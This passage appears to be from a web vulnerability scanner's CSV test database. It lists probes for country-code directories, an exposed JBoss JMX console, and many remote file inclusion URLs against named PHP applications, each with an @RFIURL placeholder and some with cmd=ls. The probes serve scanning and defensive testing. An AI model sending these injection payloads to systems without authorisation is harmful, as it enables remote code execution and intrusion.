"003713","3092","1","/ke/","GET","200","","","","","This might be interesting... potential country code (Kenya)","",""
"003714","3092","1","/ki/","GET","200","","","","","This might be interesting... potential country code (Kiribati)","",""
"003715","3092","1","/kp/","GET","200","","","","","This might be interesting... potential country code (Democratic People's Republic Of Korea)","",""
"003716","3092","1","/kr/","GET","200","","","","","This might be interesting... potential country code (Republic Of Korea)","",""
"003717","3092","1","/kw/","GET","200","","","","","This might be interesting... potential country code (Kuwait)","",""
"003718","3092","1","/kg/","GET","200","","","","","This might be interesting... potential country code (Kyrgyzstan)","",""
"003719","3092","1","/la/","GET","200","","","","","This might be interesting... potential country code (Lao People's Democratic Republic)","",""
"003720","3092","1","/lv/","GET","200","","","","","This might be interesting... potential country code (Latvia)","",""
"003721","3092","1","/lb/","GET","200","","","","","This might be interesting... potential country code (Lebanon)","",""
"003722","3092","1","/ls/","GET","200","","","","","This might be interesting... potential country code (Lesotho)","",""
"003723","3092","1","/lr/","GET","200","","","","","This might be interesting... potential country code (Liberia)","",""
"003724","3092","1","/ly/","GET","200","","","","","This might be interesting... potential country code (Libyan Arab Jamahiriya)","",""
"003725","3092","1","/li/","GET","200","","","","","This might be interesting... potential country code (Liechtenstein)","",""
"003726","3092","1","/lt/","GET","200","","","","","This might be interesting... potential country code (Lithuania)","",""
"003727","3092","1","/lu/","GET","200","","","","","This might be interesting... potential country code (Luxembourg)","",""
"003728","3092","1","/mo/","GET","200","","","","","This might be interesting... potential country code (Macao)","",""
"003729","3092","1","/mk/","GET","200","","","","","This might be interesting... potential country code (Macedonia)","",""
"003730","3092","1","/mg/","GET","200","","","","","This might be interesting... potential country code (Madagascar)","",""
"003731","3092","1","/mw/","GET","200","","","","","This might be interesting... potential country code (Malawi)","",""
"003732","3092","1","/my/","GET","200","","","","","This might be interesting... potential country code (Malaysia)","",""
"003733","3092","1","/mv/","GET","200","","","","","This might be interesting... potential country code (Maldives)","",""
"003734","3092","1","/ml/","GET","200","","","","","This might be interesting... potential country code (Mali)","",""
"003735","3092","1","/mt/","GET","200","","","","","This might be interesting... potential country code (Malta)","",""
"003736","3092","1","/mh/","GET","200","","","","","This might be interesting... potential country code (Marshall Islands)","",""
"003737","3092","1","/mq/","GET","200","","","","","This might be interesting... potential country code (Martinique)","",""
"003738","3092","1","/mr/","GET","200","","","","","This might be interesting... potential country code (Mauritania)","",""
"003739","3092","1","/mu/","GET","200","","","","","This might be interesting... potential country code (Mauritius)","",""
"003740","3092","1","/yt/","GET","200","","","","","This might be interesting... potential country code (Mayotte)","",""
"003741","3092","1","/mx/","GET","200","","","","","This might be interesting... potential country code (Mexico)","",""
"003742","3092","1","/fm/","GET","200","","","","","This might be interesting... potential country code (Federated States Of Micronesia)","",""
"003743","3092","1","/md/","GET","200","","","","","This might be interesting... potential country code (Republic Of Moldova)","",""
"003744","3092","1","/mc/","GET","200","","","","","This might be interesting... potential country code (Monaco)","",""
"003745","3092","1","/mn/","GET","200","","","","","This might be interesting... potential country code (Mongolia)","",""
"003746","3092","1","/me/","GET","200","","","","","This might be interesting... potential country code (Montenegro)","",""
"003747","3092","1","/ms/","GET","200","","","","","This might be interesting... potential country code (Montserrat)","",""
"003748","3092","1","/ma/","GET","200","","","","","This might be interesting... potential country code (Morocco)","",""
"003749","3092","1","/mz/","GET","200","","","","","This might be interesting... potential country code (Mozambique)","",""
"003750","3092","1","/mm/","GET","200","","","","","This might be interesting... potential country code (Myanmar)","",""
"003751","3092","1","/na/","GET","200","","","","","This might be interesting... potential country code (Namibia)","",""
"003752","3092","1","/nr/","GET","200","","","","","This might be interesting... potential country code (Nauru)","",""
"003753","3092","1","/np/","GET","200","","","","","This might be interesting... potential country code (Nepal)","",""
"003754","3092","1","/nl/","GET","200","","","","","This might be interesting... potential country code (Netherlands)","",""
"003755","3092","1","/an/","GET","200","","","","","This might be interesting... potential country code (Netherlands Antilles)","",""
"003756","3092","1","/nc/","GET","200","","","","","This might be interesting... potential country code (New Caledonia)","",""
"003757","3092","1","/nz/","GET","200","","","","","This might be interesting... potential country code (New Zealand)","",""
"003758","3092","1","/ni/","GET","200","","","","","This might be interesting... potential country code (Nicaragua)","",""
"003759","3092","1","/ne/","GET","200","","","","","This might be interesting... potential country code (Niger)","",""
"003760","3092","1","/ng/","GET","200","","","","","This might be interesting... potential country code (Nigeria)","",""
"003761","3092","1","/nu/","GET","200","","","","","This might be interesting... potential country code (Niue)","",""
"003762","3092","1","/nf/","GET","200","","","","","This might be interesting... potential country code (Norfolk Island)","",""
"003763","3092","1","/mp/","GET","200","","","","","This might be interesting... potential country code (Northern Mariana Islands)","",""
"003764","3092","1","/no/","GET","200","","","","","This might be interesting... potential country code (Norway)","",""
"003765","3092","1","/om/","GET","200","","","","","This might be interesting... potential country code (Oman)","",""
"003766","3092","1","/pk/","GET","200","","","","","This might be interesting... potential country code (Pakistan)","",""
"003767","3092","1","/pw/","GET","200","","","","","This might be interesting... potential country code (Palau)","",""
"003768","3092","1","/ps/","GET","200","","","","","This might be interesting... potential country code (Palestinian Territory)","",""
"003769","3092","1","/pa/","GET","200","","","","","This might be interesting... potential country code (Panama)","",""
"003770","3092","1","/pg/","GET","200","","","","","This might be interesting... potential country code (Papua New Guinea)","",""
"003771","3092","1","/py/","GET","200","","","","","This might be interesting... potential country code (Paraguay)","",""
"003772","3092","1","/pe/","GET","200","","","","","This might be interesting... potential country code (Peru)","",""
"003773","3092","1","/ph/","GET","200","","","","","This might be interesting... potential country code (Philippines)","",""
"003774","3092","1","/pn/","GET","200","","","","","This might be interesting... potential country code (Pitcairn)","",""
"003775","3092","1","/pl/","GET","200","","","","","This might be interesting... potential country code (Poland)","",""
"003776","3092","1","/pt/","GET","200","","","","","This might be interesting... potential country code (Portugal)","",""
"003777","3092","1","/pr/","GET","200","","","","","This might be interesting... potential country code (Puerto Rico)","",""
"003778","3092","1","/qa/","GET","200","","","","","This might be interesting... potential country code (Qatar)","",""
"003779","3092","1","/re/","GET","200","","","","","This might be interesting... potential country code (RÉunion)","",""
"003780","3092","1","/ro/","GET","200","","","","","This might be interesting... potential country code (Romania)","",""
"003781","3092","1","/ru/","GET","200","","","","","This might be interesting... potential country code (Russian Federation)","",""
"003782","3092","1","/rw/","GET","200","","","","","This might be interesting... potential country code (Rwanda)","",""
"003783","3092","1","/bl/","GET","200","","","","","This might be interesting... potential country code (Saint BarthÉlemy)","",""
"003784","3092","1","/sh/","GET","200","","","","","This might be interesting... potential country code (Saint Helena)","",""
"003785","3092","1","/kn/","GET","200","","","","","This might be interesting... potential country code (Saint Kitts And Nevis)","",""
"003786","3092","1","/lc/","GET","200","","","","","This might be interesting... potential country code (Saint Lucia)","",""
"003787","3092","1","/mf/","GET","200","","","","","This might be interesting... potential country code (Saint Martin)","",""
"003788","3092","1","/pm/","GET","200","","","","","This might be interesting... potential country code (Saint Pierre And Miquelon)","",""
"003789","3092","1","/vc/","GET","200","","","","","This might be interesting... potential country code (Saint Vincent And The Grenadines)","",""
"003790","3092","1","/ws/","GET","200","","","","","This might be interesting... potential country code (Samoa)","",""
"003791","3092","1","/sm/","GET","200","","","","","This might be interesting... potential country code (San Marino)","",""
"003792","3092","1","/st/","GET","200","","","","","This might be interesting... potential country code (Sao Tome And Principe)","",""
"003793","3092","1","/sa/","GET","200","","","","","This might be interesting... potential country code (Saudi Arabia)","",""
"003794","3092","1","/sn/","GET","200","","","","","This might be interesting... potential country code (Senegal)","",""
"003795","3092","1","/rs/","GET","200","","","","","This might be interesting... potential country code (Serbia)","",""
"003796","3092","1","/sc/","GET","200","","","","","This might be interesting... potential country code (Seychelles)","",""
"003797","3092","1","/sl/","GET","200","","","","","This might be interesting... potential country code (Sierra Leone)","",""
"003798","3092","1","/sg/","GET","200","","","","","This might be interesting... potential country code (Singapore)","",""
"003799","3092","1","/sk/","GET","200","","","","","This might be interesting... potential country code (Slovakia)","",""
"003800","3092","1","/si/","GET","200","","","","","This might be interesting... potential country code (Slovenia)","",""
"003801","3092","1","/sb/","GET","200","","","","","This might be interesting... potential country code (Solomon Islands)","",""
"003802","3092","1","/so/","GET","200","","","","","This might be interesting... potential country code (Somalia)","",""
"003803","3092","1","/za/","GET","200","","","","","This might be interesting... potential country code (South Africa)","",""
"003804","3092","1","/gs/","GET","200","","","","","This might be interesting... potential country code (South Georgia And The South Sandwich Islands)","",""
"003805","3092","1","/es/","GET","200","","","","","This might be interesting... potential country code (Spain)","",""
"003806","3092","1","/lk/","GET","200","","","","","This might be interesting... potential country code (Sri Lanka)","",""
"003807","3092","1","/sd/","GET","200","","","","","This might be interesting... potential country code (Sudan)","",""
"003808","3092","1","/sr/","GET","200","","","","","This might be interesting... potential country code (Suriname)","",""
"003809","3092","1","/sj/","GET","200","","","","","This might be interesting... potential country code (Svalbard And Jan Mayen)","",""
"003810","3092","1","/sz/","GET","200","","","","","This might be interesting... potential country code (Swaziland)","",""
"003811","3092","1","/se/","GET","200","","","","","This might be interesting... potential country code (Sweden)","",""
"003812","3092","1","/ch/","GET","200","","","","","This might be interesting... potential country code (Switzerland)","",""
"003813","3092","1","/sy/","GET","200","","","","","This might be interesting... potential country code (Syrian Arab Republic)","",""
"003814","3092","1","/tw/","GET","200","","","","","This might be interesting... potential country code (Taiwan)","",""
"003815","3092","1","/tj/","GET","200","","","","","This might be interesting... potential country code (Tajikistan)","",""
"003816","3092","1","/tz/","GET","200","","","","","This might be interesting... potential country code (United Republic Of Tanzania)","",""
"003817","3092","1","/th/","GET","200","","","","","This might be interesting... potential country code (Thailand)","",""
"003818","3092","1","/tl/","GET","200","","","","","This might be interesting... potential country code (Timor-leste)","",""
"003819","3092","1","/tg/","GET","200","","","","","This might be interesting... potential country code (Togo)","",""
"003820","3092","1","/tk/","GET","200","","","","","This might be interesting... potential country code (Tokelau)","",""
"003821","3092","1","/to/","GET","200","","","","","This might be interesting... potential country code (Tonga)","",""
"003822","3092","1","/tt/","GET","200","","","","","This might be interesting... potential country code (Trinidad And Tobago)","",""
"003823","3092","1","/tn/","GET","200","","","","","This might be interesting... potential country code (Tunisia)","",""
"003824","3092","1","/tr/","GET","200","","","","","This might be interesting... potential country code (Turkey)","",""
"003825","3092","1","/tm/","GET","200","","","","","This might be interesting... potential country code (Turkmenistan)","",""
"003826","3092","1","/tc/","GET","200","","","","","This might be interesting... potential country code (Turks And Caicos Islands)","",""
"003827","3092","1","/tv/","GET","200","","","","","This might be interesting... potential country code (Tuvalu)","",""
"003828","3092","1","/ug/","GET","200","","","","","This might be interesting... potential country code (Uganda)","",""
"003829","3092","1","/ua/","GET","200","","","","","This might be interesting... potential country code (Ukraine)","",""
"003830","3092","1","/ae/","GET","200","","","","","This might be interesting... potential country code (United Arab Emirates)","",""
"003831","3092","1","/gb/","GET","200","","","","","This might be interesting... potential country code (United Kingdom)","",""
"003832","3092","1","/us/","GET","200","","","","","This might be interesting... potential country code (United States)","",""
"003833","3092","1","/um/","GET","200","","","","","This might be interesting... potential country code (United States Minor Outlying Islands)","",""
"003834","3092","1","/uy/","GET","200","","","","","This might be interesting... potential country code (Uruguay)","",""
"003835","3092","1","/uz/","GET","200","","","","","This might be interesting... potential country code (Uzbekistan)","",""
"003836","3092","1","/vu/","GET","200","","","","","This might be interesting... potential country code (Vanuatu)","",""
"003837","3092","1","/ve/","GET","200","","","","","This might be interesting... potential country code (Venezuela)","",""
"003838","3092","1","/vn/","GET","200","","","","","This might be interesting... potential country code (Viet Nam)","",""
"003839","3092","1","/vg/","GET","200","","","","","This might be interesting... potential country code (British Virgin Islands)","",""
"003840","3092","1","/vi/","GET","200","","","","","This might be interesting... potential country code (U.S. Virgin Islands)","",""
"003841","3092","1","/wf/","GET","200","","","","","This might be interesting... potential country code (Wallis And Futuna)","",""
"003842","3092","1","/eh/","GET","200","","","","","This might be interesting... potential country code (Western Sahara)","",""
"003843","3092","1","/ye/","GET","200","","","","","This might be interesting... potential country code (Yemen)","",""
"003844","3092","1","/zm/","GET","200","","","","","This might be interesting... potential country code (Zambia)","",""
"003845","3092","1","/zw/","GET","200","","","","","This might be interesting... potential country code (Zimbabwe)","",""
"003846","61059","3b","/jmx-console/","GET","ObjectName","","","","","JBoss JMX Agent View found. See http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf","",""
"003846","61059","3b","/jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer","GET","Shutdown password","","","","","JBoss JMX Agent reveals the shutdown password and port information","",""
"003847","0","b","/help/wwhelp/wwhimpl/js/html/wwhelp.htm","GET","Quadralay Corporation","","","","","WWW help files generated by Quadralay Corp's software","",""
"003848","3092","1","/www/2","GET","200","","","","","This might be interesting...","",""
"003849","5292","c","/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003850","5292","c","/123flashchat.php?e107path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003851","5292","c","/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003852","5292","c","/22_ultimate/templates/header.php?mainpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003853","5292","c","/22_ultimate/templates/header.php?mainpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003854","5292","c","/?_CONFIG[files][functions_page]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003855","5292","c","/?npage=-1&content_dir=@RFIURL%00&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003856","5292","c","/?npage=1&content_dir=@RFIURL%00&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003857","5292","c","/?show=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003858","5292","c","/A-Blog/navigation/donation.php?navigation_start=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003859","5292","c","/A-Blog/navigation/latestnews.php?navigation_start=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003860","5292","c","/A-Blog/navigation/links.php?navigation_start=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003861","5292","c","/A-Blog/navigation/search.php?navigation_end=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003862","5292","c","/A-Blog/sources/myaccount.php?open_box=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003863","5292","c","/ACGVnews/header.php?PathNews=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003864","5292","c","/ATutor/documentation/common/frame_toc.php?section=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003865","5292","c","/ATutor/documentation/common/search.php?section=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003866","5292","c","/ATutor/documentation/common/vitals.inc.php?req_lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003867","5292","c","/ATutor/include/classes/module/module.class.php?row[dir_name]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003868","5292","c","/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003869","5292","c","/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003870","5292","c","/Administration/Includes/configureText.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003871","5292","c","/Administration/Includes/contentHome.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003872","5292","c","/Administration/Includes/deleteContent.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003873","5292","c","/Administration/Includes/deleteUser.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003874","5292","c","/Administration/Includes/userHome.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003875","5292","c","/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003876","5292","c","/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003877","5292","c","/BE_config.php?_PSL[classdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003878","5292","c","/BPNEWS/bn_smrep1.php?bnrep=@RFIURL?&","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003879","5292","c","/Base/Application.php?pear_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003880","5292","c","/Bcwb_PATH/dcontent/default.css.php?root_path_admin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003881","5292","c","/Bcwb_PATH/include/startup.inc.php?root_path_admin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003882","5292","c","/Bcwb_PATH/system/default.css.php?root_path_admin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003883","5292","c","/Beautifier/Core.php?BEAUT_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003884","5292","c","/BetaBlockModules//Module/Module.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003885","5292","c","/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003886","5292","c","/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003887","5292","c","/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003888","5292","c","/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003889","5292","c","/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003890","5292","c","/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003891","5292","c","/BetaBlockModules/EditProfileModule/external.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003892","5292","c","/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003893","5292","c","/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003894","5292","c","/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003895","5292","c","/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003896","5292","c","/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003897","5292","c","/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003898","5292","c","/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003899","5292","c","/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003900","5292","c","/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003901","5292","c","/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003902","5292","c","/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003903","5292","c","/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003904","5292","c","/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003905","5292","c","/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003906","5292","c","/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003907","5292","c","/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003908","5292","c","/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003909","5292","c","/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003910","5292","c","/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003911","5292","c","/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003912","5292","c","/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003913","5292","c","/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003914","5292","c","/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003915","5292","c","/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003916","5292","c","/BetaBlockModules/MyNetworksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003917","5292","c","/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003918","5292","c","/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003919","5292","c","/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003920","5292","c","/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003921","5292","c","/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003922","5292","c","/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003923","5292","c","/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003924","5292","c","/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"003925","5292","c","/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
